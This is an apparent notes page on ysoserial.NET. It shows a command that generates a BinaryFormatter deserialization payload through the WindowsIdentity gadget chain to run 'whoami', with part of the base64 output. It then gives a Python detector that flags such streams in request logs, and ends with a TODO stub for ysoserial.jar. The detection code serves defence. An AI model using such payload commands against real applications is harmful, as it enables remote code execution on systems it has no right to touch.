Ysoserial.NET
ysoserial.NET only works on Windows. After downloading it, identify the gadget chain that will run the command (-g) and the formatter (-f) used by the code that has the deserialization/serialization vulnerability:
C:\Users\Administrator\Desktop\Release>ysoserial.exe -g WindowsIdentity -f BinaryFormatter -o base64 -c "whoami"
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFs...
dGdVkyVStEUW84TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2o0TAs=
Example: Scrambled
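From the defender's side, the output above is easy to recognize: a BinaryFormatter stream starts with a fixed header, so its base64 form begins with AAEAAAD/////. The following added example (not part of the original notes or of ysoserial.NET) checks a request value for that header and reads the root class name from the first record. The function names and the sample bytes are constructed for illustration.

```python
import base64
import binascii
import struct

# First NRBF records whose body starts with ObjectId + class name.
CLASS_RECORDS = {0x04: "SystemClassWithMembersAndTypes", 0x05: "ClassWithMembersAndTypes"}


def _read_7bit_len(buf, pos):
    """Decode the 7-bit variable-length prefix of a LengthPrefixedString."""
    length = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        length |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return length, pos
        shift += 7


def inspect_value(value):
    """Return None unless value is a base64 BinaryFormatter stream, else a finding dict."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) < 18 or raw[0] != 0x00:  # SerializedStreamHeader record
        return None
    _root_id, header_id, major, minor = struct.unpack_from("<iiii", raw, 1)
    if (header_id, major, minor) != (-1, 1, 0):
        return None
    record = raw[17]
    finding = {"record": CLASS_RECORDS.get(record, hex(record)), "class": None}
    if record in CLASS_RECORDS:
        try:
            length, pos = _read_7bit_len(raw, 22)  # 18..21 hold the ObjectId
            finding["class"] = raw[pos:pos + length].decode("utf-8", "replace")
        except IndexError:
            pass  # truncated stream: header matched, class name missing
    return finding


# Constructed sample: stream header plus the start of one class record.
_NAME = b"System.Security.Principal.WindowsIdentity"
SAMPLE = base64.b64encode(
    b"\x00" + struct.pack("<iiii", 1, -1, 1, 0)
    + b"\x04" + struct.pack("<i", 1) + bytes([len(_NAME)]) + _NAME
).decode()
```

Run inspect_value over cookie, form field and header values in request logs; a non-None result on input the application did not produce itself is worth an alert.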
Ysoserial.jar
ysoserial.jar is the counterpart for Java deserialization.
TODO